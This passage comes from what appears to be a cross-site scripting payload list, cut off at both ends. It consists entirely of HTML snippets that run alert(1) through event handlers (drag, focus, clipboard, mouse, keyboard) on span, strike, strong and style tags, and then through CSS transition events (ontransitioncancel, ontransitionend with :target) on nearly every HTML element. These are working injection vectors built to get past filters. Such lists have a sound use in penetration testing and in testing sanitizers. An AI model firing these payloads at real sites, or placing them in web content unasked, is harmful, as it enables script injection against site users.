contenteditable>test</spacer> +<spacer onmousedown="alert(1)">test</spacer> +<spacer 
onmouseenter="alert(1)">test</spacer> +<spacer onmouseleave="alert(1)">test</spacer> +<spacer onmousemove="alert(1)">test</spacer> +<spacer onmouseout="alert(1)">test</spacer> +<spacer onmouseover="alert(1)">test</spacer> +<spacer onmouseup="alert(1)">test</spacer> +<spacer onpaste="alert(1)" contenteditable>test</spacer> +<span draggable="true" ondrag="alert(1)">test</span> +<span draggable="true" ondragend="alert(1)">test</span> +<span draggable="true" ondragenter="alert(1)">test</span> +<span draggable="true" ondragleave="alert(1)">test</span> +<span draggable="true" ondragstart="alert(1)">test</span> +<span id=x tabindex=1 onactivate=alert(1)></span> +<span id=x tabindex=1 onbeforeactivate=alert(1)></span> +<span id=x tabindex=1 onbeforedeactivate=alert(1)></span><input autofocus> +<span id=x tabindex=1 ondeactivate=alert(1)></span><input id=y autofocus> +<span id=x tabindex=1 onfocus=alert(1)></span> +<span id=x tabindex=1 onfocusin=alert(1)></span> +<span onbeforecopy="alert(1)" contenteditable>test</span> +<span onbeforecut="alert(1)" contenteditable>test</span> +<span onbeforepaste="alert(1)" contenteditable>test</span> +<span onblur=alert(1) tabindex=1 id=x></span><input autofocus> +<span onclick="alert(1)">test</span> +<span oncontextmenu="alert(1)">test</span> +<span oncopy="alert(1)" contenteditable>test</span> +<span oncut="alert(1)" contenteditable>test</span> +<span ondblclick="alert(1)">test</span> +<span onfocusout=alert(1) tabindex=1 id=x></span><input autofocus> +<span onkeydown="alert(1)" contenteditable>test</span> +<span onkeypress="alert(1)" contenteditable>test</span> +<span onkeyup="alert(1)" contenteditable>test</span> +<span onmousedown="alert(1)">test</span> +<span onmouseenter="alert(1)">test</span> +<span onmouseleave="alert(1)">test</span> +<span onmousemove="alert(1)">test</span> +<span onmouseout="alert(1)">test</span> +<span onmouseover="alert(1)">test</span> +<span onmouseup="alert(1)">test</span> +<span onpaste="alert(1)" 
contenteditable>test</span> +<strike draggable="true" ondrag="alert(1)">test</strike> +<strike draggable="true" ondragend="alert(1)">test</strike> +<strike draggable="true" ondragenter="alert(1)">test</strike> +<strike draggable="true" ondragleave="alert(1)">test</strike> +<strike draggable="true" ondragstart="alert(1)">test</strike> +<strike id=x tabindex=1 onactivate=alert(1)></strike> +<strike id=x tabindex=1 onbeforeactivate=alert(1)></strike> +<strike id=x tabindex=1 onbeforedeactivate=alert(1)></strike><input autofocus> +<strike id=x tabindex=1 ondeactivate=alert(1)></strike><input id=y autofocus> +<strike id=x tabindex=1 onfocus=alert(1)></strike> +<strike id=x tabindex=1 onfocusin=alert(1)></strike> +<strike onbeforecopy="alert(1)" contenteditable>test</strike> +<strike onbeforecut="alert(1)" contenteditable>test</strike> +<strike onbeforepaste="alert(1)" contenteditable>test</strike> +<strike onblur=alert(1) tabindex=1 id=x></strike><input autofocus> +<strike onclick="alert(1)">test</strike> +<strike oncontextmenu="alert(1)">test</strike> +<strike oncopy="alert(1)" contenteditable>test</strike> +<strike oncut="alert(1)" contenteditable>test</strike> +<strike ondblclick="alert(1)">test</strike> +<strike onfocusout=alert(1) tabindex=1 id=x></strike><input autofocus> +<strike onkeydown="alert(1)" contenteditable>test</strike> +<strike onkeypress="alert(1)" contenteditable>test</strike> +<strike onkeyup="alert(1)" contenteditable>test</strike> +<strike onmousedown="alert(1)">test</strike> +<strike onmouseenter="alert(1)">test</strike> +<strike onmouseleave="alert(1)">test</strike> +<strike onmousemove="alert(1)">test</strike> +<strike onmouseout="alert(1)">test</strike> +<strike onmouseover="alert(1)">test</strike> +<strike onmouseup="alert(1)">test</strike> +<strike onpaste="alert(1)" contenteditable>test</strike> +<strong draggable="true" ondrag="alert(1)">test</strong> +<strong draggable="true" ondragend="alert(1)">test</strong> +<strong draggable="true" 
ondragenter="alert(1)">test</strong> +<strong draggable="true" ondragleave="alert(1)">test</strong> +<strong draggable="true" ondragstart="alert(1)">test</strong> +<strong id=x tabindex=1 onactivate=alert(1)></strong> +<strong id=x tabindex=1 onbeforeactivate=alert(1)></strong> +<strong id=x tabindex=1 onbeforedeactivate=alert(1)></strong><input autofocus> +<strong id=x tabindex=1 ondeactivate=alert(1)></strong><input id=y autofocus> +<strong id=x tabindex=1 onfocus=alert(1)></strong> +<strong id=x tabindex=1 onfocusin=alert(1)></strong> +<strong onbeforecopy="alert(1)" contenteditable>test</strong> +<strong onbeforecut="alert(1)" contenteditable>test</strong> +<strong onbeforepaste="alert(1)" contenteditable>test</strong> +<strong onblur=alert(1) tabindex=1 id=x></strong><input autofocus> +<strong onclick="alert(1)">test</strong> +<strong oncontextmenu="alert(1)">test</strong> +<strong oncopy="alert(1)" contenteditable>test</strong> +<strong oncut="alert(1)" contenteditable>test</strong> +<strong ondblclick="alert(1)">test</strong> +<strong onfocusout=alert(1) tabindex=1 id=x></strong><input autofocus> +<strong onkeydown="alert(1)" contenteditable>test</strong> +<strong onkeypress="alert(1)" contenteditable>test</strong> +<strong onkeyup="alert(1)" contenteditable>test</strong> +<strong onmousedown="alert(1)">test</strong> +<strong onmouseenter="alert(1)">test</strong> +<strong onmouseleave="alert(1)">test</strong> +<strong onmousemove="alert(1)">test</strong> +<strong onmouseout="alert(1)">test</strong> +<strong onmouseover="alert(1)">test</strong> +<strong onmouseup="alert(1)">test</strong> +<strong onpaste="alert(1)" contenteditable>test</strong> +<style draggable="true" ondrag="alert(1)">test</style> +<style draggable="true" ondragend="alert(1)">test</style> +<style draggable="true" ondragenter="alert(1)">test</style> +<style draggable="true" ondragleave="alert(1)">test</style> +<style draggable="true" ondragstart="alert(1)">test</style> +<style id=x 
tabindex=1 onactivate=alert(1)></style> +<style id=x tabindex=1 onbeforeactivate=alert(1)></style> +<style id=x tabindex=1 onbeforedeactivate=alert(1)></style><input autofocus> +<style id=x tabindex=1 ondeactivate=alert(1)></style><input id=y autofocus> +<style id=x tabindex=1 onfocus=alert(1)></style> +<style id=x tabindex=1 onfocusin=alert(1)></style> +<style onbeforecopy="alert(1)" contenteditable>test</style> +<style onbeforecut="alert(1)" contenteditable>test</style> +<style onbeforepaste="alert(1)" contenteditable>test</style> +<style onblur=alert(1) tabindex=1 id=x></style><input autofocus> +<style onclick="alert(1)">test</style> +<style oncontextmenu="alert(1)">test</style> +<style oncopy="alert(1)" contenteditable>test</style> +<style oncut="alert(1)" contenteditable>test</style> +<style ondblclick="alert(1)">test</style> +<style onfocusout=alert(1) tabindex=1 id=x></style><input autofocus> +<style onkeydown="alert(1)" contenteditable>test</style> +<style onkeypress="alert(1)" contenteditable>test</style> +<style onkeyup="alert(1)" contenteditable>test</style> +<style onload=alert(1)></style> +<style onmousedown="alert(1)">test</style> +<style onmouseenter="alert(1)">test</style> +<style onmouseleave="alert(1)">test</style> +<style onmousemove="alert(1)">test</style> +<style onmouseout="alert(1)">test</style> +<style onmouseover="alert(1)">test</style> +<style onmouseup="alert(1)">test</style> +<style onpaste="alert(1)" contenteditable>test</style> +<style onreadystatechange=alert(1)></style> +<style>:target {color: red;}</style><a id=x style="transition:color 10s" ontransitioncancel=alert(1)></a> +<style>:target {color: red;}</style><abbr id=x style="transition:color 10s" ontransitioncancel=alert(1)></abbr> +<style>:target {color: red;}</style><acronym id=x style="transition:color 10s" ontransitioncancel=alert(1)></acronym> +<style>:target {color: red;}</style><address id=x style="transition:color 10s" ontransitioncancel=alert(1)></address> 
+<style>:target {color: red;}</style><applet id=x style="transition:color 10s" ontransitioncancel=alert(1)></applet> +<style>:target {color: red;}</style><area id=x style="transition:color 10s" ontransitioncancel=alert(1)></area> +<style>:target {color: red;}</style><article id=x style="transition:color 10s" ontransitioncancel=alert(1)></article> +<style>:target {color: red;}</style><aside id=x style="transition:color 10s" ontransitioncancel=alert(1)></aside> +<style>:target {color: red;}</style><audio id=x style="transition:color 10s" ontransitioncancel=alert(1)></audio> +<style>:target {color: red;}</style><b id=x style="transition:color 10s" ontransitioncancel=alert(1)></b> +<style>:target {color: red;}</style><base id=x style="transition:color 10s" ontransitioncancel=alert(1)></base> +<style>:target {color: red;}</style><basefont id=x style="transition:color 10s" ontransitioncancel=alert(1)></basefont> +<style>:target {color: red;}</style><bdi id=x style="transition:color 10s" ontransitioncancel=alert(1)></bdi> +<style>:target {color: red;}</style><bdo id=x style="transition:color 10s" ontransitioncancel=alert(1)></bdo> +<style>:target {color: red;}</style><bgsound id=x style="transition:color 10s" ontransitioncancel=alert(1)></bgsound> +<style>:target {color: red;}</style><big id=x style="transition:color 10s" ontransitioncancel=alert(1)></big> +<style>:target {color: red;}</style><blink id=x style="transition:color 10s" ontransitioncancel=alert(1)></blink> +<style>:target {color: red;}</style><blockquote id=x style="transition:color 10s" ontransitioncancel=alert(1)></blockquote> +<style>:target {color: red;}</style><body id=x style="transition:color 10s" ontransitioncancel=alert(1)></body> +<style>:target {color: red;}</style><br id=x style="transition:color 10s" ontransitioncancel=alert(1)></br> +<style>:target {color: red;}</style><button id=x style="transition:color 10s" ontransitioncancel=alert(1)></button> +<style>:target {color: red;}</style><canvas 
id=x style="transition:color 10s" ontransitioncancel=alert(1)></canvas> +<style>:target {color: red;}</style><caption id=x style="transition:color 10s" ontransitioncancel=alert(1)></caption> +<style>:target {color: red;}</style><center id=x style="transition:color 10s" ontransitioncancel=alert(1)></center> +<style>:target {color: red;}</style><cite id=x style="transition:color 10s" ontransitioncancel=alert(1)></cite> +<style>:target {color: red;}</style><code id=x style="transition:color 10s" ontransitioncancel=alert(1)></code> +<style>:target {color: red;}</style><col id=x style="transition:color 10s" ontransitioncancel=alert(1)></col> +<style>:target {color: red;}</style><colgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></colgroup> +<style>:target {color: red;}</style><command id=x style="transition:color 10s" ontransitioncancel=alert(1)></command> +<style>:target {color: red;}</style><content id=x style="transition:color 10s" ontransitioncancel=alert(1)></content> +<style>:target {color: red;}</style><data id=x style="transition:color 10s" ontransitioncancel=alert(1)></data> +<style>:target {color: red;}</style><datalist id=x style="transition:color 10s" ontransitioncancel=alert(1)></datalist> +<style>:target {color: red;}</style><dd id=x style="transition:color 10s" ontransitioncancel=alert(1)></dd> +<style>:target {color: red;}</style><del id=x style="transition:color 10s" ontransitioncancel=alert(1)></del> +<style>:target {color: red;}</style><details id=x style="transition:color 10s" ontransitioncancel=alert(1)></details> +<style>:target {color: red;}</style><dfn id=x style="transition:color 10s" ontransitioncancel=alert(1)></dfn> +<style>:target {color: red;}</style><dialog id=x style="transition:color 10s" ontransitioncancel=alert(1)></dialog> +<style>:target {color: red;}</style><dir id=x style="transition:color 10s" ontransitioncancel=alert(1)></dir> +<style>:target {color: red;}</style><div id=x style="transition:color 10s" 
ontransitioncancel=alert(1)></div> +<style>:target {color: red;}</style><dl id=x style="transition:color 10s" ontransitioncancel=alert(1)></dl> +<style>:target {color: red;}</style><dt id=x style="transition:color 10s" ontransitioncancel=alert(1)></dt> +<style>:target {color: red;}</style><element id=x style="transition:color 10s" ontransitioncancel=alert(1)></element> +<style>:target {color: red;}</style><em id=x style="transition:color 10s" ontransitioncancel=alert(1)></em> +<style>:target {color: red;}</style><embed id=x style="transition:color 10s" ontransitioncancel=alert(1)></embed> +<style>:target {color: red;}</style><fieldset id=x style="transition:color 10s" ontransitioncancel=alert(1)></fieldset> +<style>:target {color: red;}</style><figcaption id=x style="transition:color 10s" ontransitioncancel=alert(1)></figcaption> +<style>:target {color: red;}</style><figure id=x style="transition:color 10s" ontransitioncancel=alert(1)></figure> +<style>:target {color: red;}</style><font id=x style="transition:color 10s" ontransitioncancel=alert(1)></font> +<style>:target {color: red;}</style><footer id=x style="transition:color 10s" ontransitioncancel=alert(1)></footer> +<style>:target {color: red;}</style><form id=x style="transition:color 10s" ontransitioncancel=alert(1)></form> +<style>:target {color: red;}</style><frame id=x style="transition:color 10s" ontransitioncancel=alert(1)></frame> +<style>:target {color: red;}</style><frameset id=x style="transition:color 10s" ontransitioncancel=alert(1)></frameset> +<style>:target {color: red;}</style><h1 id=x style="transition:color 10s" ontransitioncancel=alert(1)></h1> +<style>:target {color: red;}</style><head id=x style="transition:color 10s" ontransitioncancel=alert(1)></head> +<style>:target {color: red;}</style><header id=x style="transition:color 10s" ontransitioncancel=alert(1)></header> +<style>:target {color: red;}</style><hgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></hgroup> 
+<style>:target {color: red;}</style><hr id=x style="transition:color 10s" ontransitioncancel=alert(1)></hr> +<style>:target {color: red;}</style><html id=x style="transition:color 10s" ontransitioncancel=alert(1)></html> +<style>:target {color: red;}</style><i id=x style="transition:color 10s" ontransitioncancel=alert(1)></i> +<style>:target {color: red;}</style><iframe id=x style="transition:color 10s" ontransitioncancel=alert(1)></iframe> +<style>:target {color: red;}</style><image id=x style="transition:color 10s" ontransitioncancel=alert(1)></image> +<style>:target {color: red;}</style><img id=x style="transition:color 10s" ontransitioncancel=alert(1)></img> +<style>:target {color: red;}</style><input id=x style="transition:color 10s" ontransitioncancel=alert(1)></input> +<style>:target {color: red;}</style><ins id=x style="transition:color 10s" ontransitioncancel=alert(1)></ins> +<style>:target {color: red;}</style><isindex id=x style="transition:color 10s" ontransitioncancel=alert(1)></isindex> +<style>:target {color: red;}</style><kbd id=x style="transition:color 10s" ontransitioncancel=alert(1)></kbd> +<style>:target {color: red;}</style><keygen id=x style="transition:color 10s" ontransitioncancel=alert(1)></keygen> +<style>:target {color: red;}</style><label id=x style="transition:color 10s" ontransitioncancel=alert(1)></label> +<style>:target {color: red;}</style><legend id=x style="transition:color 10s" ontransitioncancel=alert(1)></legend> +<style>:target {color: red;}</style><li id=x style="transition:color 10s" ontransitioncancel=alert(1)></li> +<style>:target {color: red;}</style><link id=x style="transition:color 10s" ontransitioncancel=alert(1)></link> +<style>:target {color: red;}</style><listing id=x style="transition:color 10s" ontransitioncancel=alert(1)></listing> +<style>:target {color: red;}</style><main id=x style="transition:color 10s" ontransitioncancel=alert(1)></main> +<style>:target {color: red;}</style><map id=x 
style="transition:color 10s" ontransitioncancel=alert(1)></map> +<style>:target {color: red;}</style><mark id=x style="transition:color 10s" ontransitioncancel=alert(1)></mark> +<style>:target {color: red;}</style><marquee id=x style="transition:color 10s" ontransitioncancel=alert(1)></marquee> +<style>:target {color: red;}</style><menu id=x style="transition:color 10s" ontransitioncancel=alert(1)></menu> +<style>:target {color: red;}</style><menuitem id=x style="transition:color 10s" ontransitioncancel=alert(1)></menuitem> +<style>:target {color: red;}</style><meta id=x style="transition:color 10s" ontransitioncancel=alert(1)></meta> +<style>:target {color: red;}</style><meter id=x style="transition:color 10s" ontransitioncancel=alert(1)></meter> +<style>:target {color: red;}</style><multicol id=x style="transition:color 10s" ontransitioncancel=alert(1)></multicol> +<style>:target {color: red;}</style><nav id=x style="transition:color 10s" ontransitioncancel=alert(1)></nav> +<style>:target {color: red;}</style><nextid id=x style="transition:color 10s" ontransitioncancel=alert(1)></nextid> +<style>:target {color: red;}</style><nobr id=x style="transition:color 10s" ontransitioncancel=alert(1)></nobr> +<style>:target {color: red;}</style><noembed id=x style="transition:color 10s" ontransitioncancel=alert(1)></noembed> +<style>:target {color: red;}</style><noframes id=x style="transition:color 10s" ontransitioncancel=alert(1)></noframes> +<style>:target {color: red;}</style><noscript id=x style="transition:color 10s" ontransitioncancel=alert(1)></noscript> +<style>:target {color: red;}</style><object id=x style="transition:color 10s" ontransitioncancel=alert(1)></object> +<style>:target {color: red;}</style><ol id=x style="transition:color 10s" ontransitioncancel=alert(1)></ol> +<style>:target {color: red;}</style><optgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></optgroup> +<style>:target {color: red;}</style><option id=x 
style="transition:color 10s" ontransitioncancel=alert(1)></option> +<style>:target {color: red;}</style><output id=x style="transition:color 10s" ontransitioncancel=alert(1)></output> +<style>:target {color: red;}</style><p id=x style="transition:color 10s" ontransitioncancel=alert(1)></p> +<style>:target {color: red;}</style><param id=x style="transition:color 10s" ontransitioncancel=alert(1)></param> +<style>:target {color: red;}</style><picture id=x style="transition:color 10s" ontransitioncancel=alert(1)></picture> +<style>:target {color: red;}</style><plaintext id=x style="transition:color 10s" ontransitioncancel=alert(1)></plaintext> +<style>:target {color: red;}</style><pre id=x style="transition:color 10s" ontransitioncancel=alert(1)></pre> +<style>:target {color: red;}</style><progress id=x style="transition:color 10s" ontransitioncancel=alert(1)></progress> +<style>:target {color: red;}</style><q id=x style="transition:color 10s" ontransitioncancel=alert(1)></q> +<style>:target {color: red;}</style><rb id=x style="transition:color 10s" ontransitioncancel=alert(1)></rb> +<style>:target {color: red;}</style><rp id=x style="transition:color 10s" ontransitioncancel=alert(1)></rp> +<style>:target {color: red;}</style><rt id=x style="transition:color 10s" ontransitioncancel=alert(1)></rt> +<style>:target {color: red;}</style><rtc id=x style="transition:color 10s" ontransitioncancel=alert(1)></rtc> +<style>:target {color: red;}</style><ruby id=x style="transition:color 10s" ontransitioncancel=alert(1)></ruby> +<style>:target {color: red;}</style><s id=x style="transition:color 10s" ontransitioncancel=alert(1)></s> +<style>:target {color: red;}</style><samp id=x style="transition:color 10s" ontransitioncancel=alert(1)></samp> +<style>:target {color: red;}</style><script id=x style="transition:color 10s" ontransitioncancel=alert(1)></script> +<style>:target {color: red;}</style><section id=x style="transition:color 10s" ontransitioncancel=alert(1)></section> 
+<style>:target {color: red;}</style><select id=x style="transition:color 10s" ontransitioncancel=alert(1)></select> +<style>:target {color: red;}</style><shadow id=x style="transition:color 10s" ontransitioncancel=alert(1)></shadow> +<style>:target {color: red;}</style><slot id=x style="transition:color 10s" ontransitioncancel=alert(1)></slot> +<style>:target {color: red;}</style><small id=x style="transition:color 10s" ontransitioncancel=alert(1)></small> +<style>:target {color: red;}</style><source id=x style="transition:color 10s" ontransitioncancel=alert(1)></source> +<style>:target {color: red;}</style><spacer id=x style="transition:color 10s" ontransitioncancel=alert(1)></spacer> +<style>:target {color: red;}</style><span id=x style="transition:color 10s" ontransitioncancel=alert(1)></span> +<style>:target {color: red;}</style><strike id=x style="transition:color 10s" ontransitioncancel=alert(1)></strike> +<style>:target {color: red;}</style><strong id=x style="transition:color 10s" ontransitioncancel=alert(1)></strong> +<style>:target {color: red;}</style><style id=x style="transition:color 10s" ontransitioncancel=alert(1)></style> +<style>:target {color: red;}</style><sub id=x style="transition:color 10s" ontransitioncancel=alert(1)></sub> +<style>:target {color: red;}</style><summary id=x style="transition:color 10s" ontransitioncancel=alert(1)></summary> +<style>:target {color: red;}</style><sup id=x style="transition:color 10s" ontransitioncancel=alert(1)></sup> +<style>:target {color: red;}</style><svg id=x style="transition:color 10s" ontransitioncancel=alert(1)></svg> +<style>:target {color: red;}</style><table id=x style="transition:color 10s" ontransitioncancel=alert(1)></table> +<style>:target {color: red;}</style><tbody id=x style="transition:color 10s" ontransitioncancel=alert(1)></tbody> +<style>:target {color: red;}</style><td id=x style="transition:color 10s" ontransitioncancel=alert(1)></td> +<style>:target {color: red;}</style><template 
id=x style="transition:color 10s" ontransitioncancel=alert(1)></template> +<style>:target {color: red;}</style><textarea id=x style="transition:color 10s" ontransitioncancel=alert(1)></textarea> +<style>:target {color: red;}</style><tfoot id=x style="transition:color 10s" ontransitioncancel=alert(1)></tfoot> +<style>:target {color: red;}</style><th id=x style="transition:color 10s" ontransitioncancel=alert(1)></th> +<style>:target {color: red;}</style><thead id=x style="transition:color 10s" ontransitioncancel=alert(1)></thead> +<style>:target {color: red;}</style><time id=x style="transition:color 10s" ontransitioncancel=alert(1)></time> +<style>:target {color: red;}</style><title id=x style="transition:color 10s" ontransitioncancel=alert(1)></title> +<style>:target {color: red;}</style><tr id=x style="transition:color 10s" ontransitioncancel=alert(1)></tr> +<style>:target {color: red;}</style><track id=x style="transition:color 10s" ontransitioncancel=alert(1)></track> +<style>:target {color: red;}</style><tt id=x style="transition:color 10s" ontransitioncancel=alert(1)></tt> +<style>:target {color: red;}</style><u id=x style="transition:color 10s" ontransitioncancel=alert(1)></u> +<style>:target {color: red;}</style><ul id=x style="transition:color 10s" ontransitioncancel=alert(1)></ul> +<style>:target {color: red;}</style><var id=x style="transition:color 10s" ontransitioncancel=alert(1)></var> +<style>:target {color: red;}</style><video id=x style="transition:color 10s" ontransitioncancel=alert(1)></video> +<style>:target {color: red;}</style><wbr id=x style="transition:color 10s" ontransitioncancel=alert(1)></wbr> +<style>:target {color: red;}</style><xmp id=x style="transition:color 10s" ontransitioncancel=alert(1)></xmp> +<style>:target {color:red;}</style><a id=x style="transition:color 1s" ontransitionend=alert(1)></a> +<style>:target {color:red;}</style><abbr id=x style="transition:color 1s" ontransitionend=alert(1)></abbr> +<style>:target 
{color:red;}</style><acronym id=x style="transition:color 1s" ontransitionend=alert(1)></acronym> +<style>:target {color:red;}</style><address id=x style="transition:color 1s" ontransitionend=alert(1)></address> +<style>:target {color:red;}</style><applet id=x style="transition:color 1s" ontransitionend=alert(1)></applet> +<style>:target {color:red;}</style><area id=x style="transition:color 1s" ontransitionend=alert(1)></area> +<style>:target {color:red;}</style><article id=x style="transition:color 1s" ontransitionend=alert(1)></article> +<style>:target {color:red;}</style><aside id=x style="transition:color 1s" ontransitionend=alert(1)></aside> +<style>:target {color:red;}</style><audio id=x style="transition:color 1s" ontransitionend=alert(1)></audio> +<style>:target {color:red;}</style><b id=x style="transition:color 1s" ontransitionend=alert(1)></b> +<style>:target {color:red;}</style><base id=x style="transition:color 1s" ontransitionend=alert(1)></base> +<style>:target {color:red;}</style><basefont id=x style="transition:color 1s" ontransitionend=alert(1)></basefont> +<style>:target {color:red;}</style><bdi id=x style="transition:color 1s" ontransitionend=alert(1)></bdi> +<style>:target {color:red;}</style><bdo id=x style="transition:color 1s" ontransitionend=alert(1)></bdo> +<style>:target {color:red;}</style><bgsound id=x style="transition:color 1s" ontransitionend=alert(1)></bgsound> +<style>:target {color:red;}</style><big id=x style="transition:color 1s" ontransitionend=alert(1)></big> +<style>:target {color:red;}</style><blink id=x style="transition:color 1s" ontransitionend=alert(1)></blink> +<style>:target {color:red;}</style><blockquote id=x style="transition:color 1s" ontransitionend=alert(1)></blockquote> +<style>:target {color:red;}</style><body id=x style="transition:color 1s" ontransitionend=alert(1)></body> +<style>:target {color:red;}</style><br id=x style="transition:color 1s" ontransitionend=alert(1)></br> +<style>:target 
{color:red;}</style><button id=x style="transition:color 1s" ontransitionend=alert(1)></button> +<style>:target {color:red;}</style><canvas id=x style="transition:color 1s" ontransitionend=alert(1)></canvas> +<style>:target {color:red;}</style><caption id=x style="transition:color 1s" ontransitionend=alert(1)></caption> +<style>:target {color:red;}</style><center id=x style="transition:color 1s" ontransitionend=alert(1)></center> +<style>:target {color:red;}</style><cite id=x style="transition:color 1s" ontransitionend=alert(1)></cite> +<style>:target {color:red;}</style><code id=x style="transition:color 1s" ontransitionend=alert(1)></code> +<style>:target {color:red;}</style><col id=x style="transition:color 1s" ontransitionend=alert(1)></col> +<style>:target {color:red;}</style><colgroup id=x style="transition:color 1s" ontransitionend=alert(1)></colgroup> +<style>:target {color:red;}</style><command id=x style="transition:color 1s" ontransitionend=alert(1)></command> +<style>:target {color:red;}</style><content id=x style="transition:color 1s" ontransitionend=alert(1)></content> +<style>:target {color:red;}</style><data id=x style="transition:color 1s" ontransitionend=alert(1)></data> +<style>:target {color:red;}</style><datalist id=x style="transition:color 1s" ontransitionend=alert(1)></datalist> +<style>:target {color:red;}</style><dd id=x style="transition:color 1s" ontransitionend=alert(1)></dd> +<style>:target {color:red;}</style><del id=x style="transition:color 1s" ontransitionend=alert(1)></del> +<style>:target {color:red;}</style><details id=x style="transition:color 1s" ontransitionend=alert(1)></details> +<style>:target {color:red;}</style><dfn id=x style="transition:color 1s" ontransitionend=alert(1)></dfn> +<style>:target {color:red;}</style><dialog id=x style="transition:color 1s" ontransitionend=alert(1)></dialog> +<style>:target {color:red;}</style><dir id=x style="transition:color 1s" ontransitionend=alert(1)></dir> +<style>:target 
{color:red;}</style><div id=x style="transition:color 1s" ontransitionend=alert(1)></div> +<style>:target {color:red;}</style><dl id=x style="transition:color 1s" ontransitionend=alert(1)></dl> +<style>:target {color:red;}</style><dt id=x style="transition:color 1s" ontransitionend=alert(1)></dt> +<style>:target {color:red;}</style><element id=x style="transition:color 1s" ontransitionend=alert(1)></element> +<style>:target {color:red;}</style><em id=x style="transition:color 1s" ontransitionend=alert(1)></em> +<style>:target {color:red;}</style><embed id=x style="transition:color 1s" ontransitionend=alert(1)></embed> +<style>:target {color:red;}</style><fieldset id=x style="transition:color 1s" ontransitionend=alert(1)></fieldset> +<style>:target {color:red;}</style><figcaption id=x style="transition:color 1s" ontransitionend=alert(1)></figcaption> +<style>:target {color:red;}</style><figure id=x style="transition:color 1s" ontransitionend=alert(1)></figure> +<style>:target {color:red;}</style><font id=x style="transition:color 1s" ontransitionend=alert(1)></font> +<style>:target {color:red;}</style><footer id=x style="transition:color 1s" ontransitionend=alert(1)></footer> +<style>:target {color:red;}</style><form id=x style="transition:color 1s" ontransitionend=alert(1)></form> +<style>:target {color:red;}</style><frame id=x style="transition:color 1s" ontransitionend=alert(1)></frame> +<style>:target {color:red;}</style><frameset id=x style="transition:color 1s" ontransitionend=alert(1)></frameset> +<style>:target {color:red;}</style><h1 id=x style="transition:color 1s" ontransitionend=alert(1)></h1> +<style>:target {color:red;}</style><head id=x style="transition:color 1s" ontransitionend=alert(1)></head> +<style>:target {color:red;}</style><header id=x style="transition:color 1s" ontransitionend=alert(1)></header> +<style>:target {color:red;}</style><hgroup id=x style="transition:color 1s" ontransitionend=alert(1)></hgroup> +<style>:target 
{color:red;}</style><hr id=x style="transition:color 1s" ontransitionend=alert(1)></hr> +<style>:target {color:red;}</style><html id=x style="transition:color 1s" ontransitionend=alert(1)></html> +<style>:target {color:red;}</style><i id=x style="transition:color 1s" ontransitionend=alert(1)></i> +<style>:target {color:red;}</style><iframe id=x style="transition:color 1s" ontransitionend=alert(1)></iframe> +<style>:target {color:red;}</style><image id=x style="transition:color 1s" ontransitionend=alert(1)></image> +<style>:target {color:red;}</style><img id=x style="transition:color 1s" ontransitionend=alert(1)></img> +<style>:target {color:red;}</style><input id=x style="transition:color 1s" ontransitionend=alert(1)></input> +<style>:target {color:red;}</style><ins id=x style="transition:color 1s" ontransitionend=alert(1)></ins> +<style>:target {color:red;}</style><isindex id=x style="transition:color 1s" ontransitionend=alert(1)></isindex> +<style>:target {color:red;}</style><kbd id=x style="transition:color 1s" ontransitionend=alert(1)></kbd> +<style>:target {color:red;}</style><keygen id=x style="transition:color 1s" ontransitionend=alert(1)></keygen> +<style>:target {color:red;}</style><label id=x style="transition:color 1s" ontransitionend=alert(1)></label> +<style>:target {color:red;}</style><legend id=x style="transition:color 1s" ontransitionend=alert(1)></legend> +<style>:target {color:red;}</style><li id=x style="transition:color 1s" ontransitionend=alert(1)></li> +<style>:target {color:red;}</style><link id=x style="transition:color 1s" ontransitionend=alert(1)></link> +<style>:target {color:red;}</style><listing id=x style="transition:color 1s" ontransitionend=alert(1)></listing> +<style>:target {color:red;}</style><main id=x style="transition:color 1s" ontransitionend=alert(1)></main> +<style>:target {color:red;}</style><map id=x style="transition:color 1s" ontransitionend=alert(1)></map> +<style>:target {color:red;}</style><mark id=x 
style="transition:color 1s" ontransitionend=alert(1)></mark> +<style>:target {color:red;}</style><marquee id=x style="transition:color 1s" ontransitionend=alert(1)></marquee> +<style>:target {color:red;}</style><menu id=x style="transition:color 1s" ontransitionend=alert(1)></menu> +<style>:target {color:red;}</style><menuitem id=x style="transition:color 1s" ontransitionend=alert(1)></menuitem> +<style>:target {color:red;}</style><meta id=x style="transition:color 1s" ontransitionend=alert(1)></meta> +<style>:target {color:red;}</style><meter id=x style="transition:color 1s" ontransitionend=alert(1)></meter> +<style>:target {color:red;}</style><multicol id=x style="transition:color 1s" ontransitionend=alert(1)></multicol> +<style>:target {color:red;}</style><nav id=x style="transition:color 1s" ontransitionend=alert(1)></nav> +<style>:target {color:red;}</style><nextid id=x style="transition:color 1s" ontransitionend=alert(1)></nextid> +<style>:target {color:red;}</style><nobr id=x style="transition:color 1s" ontransitionend=alert(1)></nobr> +<style>:target {color:red;}</style><noembed id=x style="transition:color 1s" ontransitionend=alert(1)></noembed> +<style>:target {color:red;}</style><noframes id=x style="transition:color 1s" ontransitionend=alert(1)></noframes> +<style>:target {color:red;}</style><noscript id=x style="transition:color 1s" ontransitionend=alert(1)></noscript> +<style>:target {color:red;}</style><object id=x style="transition:color 1s" ontransitionend=alert(1)></object> +<style>:target {color:red;}</style><ol id=x style="transition:color 1s" ontransitionend=alert(1)></ol> +<style>:target {color:red;}</style><optgroup id=x style="transition:color 1s" ontransitionend=alert(1)></optgroup> +<style>:target {color:red;}</style><option id=x style="transition:color 1s" ontransitionend=alert(1)></option> +<style>:target {color:red;}</style><output id=x style="transition:color 1s" ontransitionend=alert(1)></output> +<style>:target {color:red;}</style><p 
